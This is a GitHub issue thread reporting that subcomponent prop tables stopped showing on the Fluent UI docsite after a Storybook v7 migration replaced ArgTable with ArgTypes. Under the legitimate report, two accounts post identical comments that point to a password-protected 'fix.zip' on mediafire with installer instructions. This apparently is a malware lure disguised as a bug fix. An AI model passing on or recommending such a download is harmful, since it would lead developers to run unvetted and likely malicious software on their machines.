### ISSUE TITLE
[Bug]:  Subcomponents props are not displayed on the docsite

### ISSUE THREAD

**Issue by dmytrokirpa** [microsoft/fluentui#32381]
### Library

react-components / v9 (@fluentui/react-components)

### System Info

```shell
all systems
```

### Are you reporting an Accessibility issue?

None

### Reproduction

https://react.fluentui.dev/?path=/docs/components-accordion--docs

## Actual Behavior
During the migration to [Storybook v7](https://github.com/microsoft/fluentui/pull/32018), as per [migration guide](https://github.com/storybookjs/storybook/blob/next/MIGRATION.md#argstable-block), we [replaced `<ArgTable />` with `<ArgTypes />`](https://github.com/microsoft/fluentui/pull/32018/files#diff-661afe41552bed0a3643e167ff32d3e5f9d1a392edf7fde2dc33296a1449967bR4). However, this has led to an issue where `<ArgTypes />` does not support subcomponents, preventing their prop documentation from being displayed on the documentation site.

## Expected Behavior
The properties of subcomponents should be accessible on the documentation site.

### Requested priority

High

### Are you willing to submit a PR to fix?

yes

### Validations

- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
- [X] The provided reproduction is a minimal reproducible example of the bug.

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
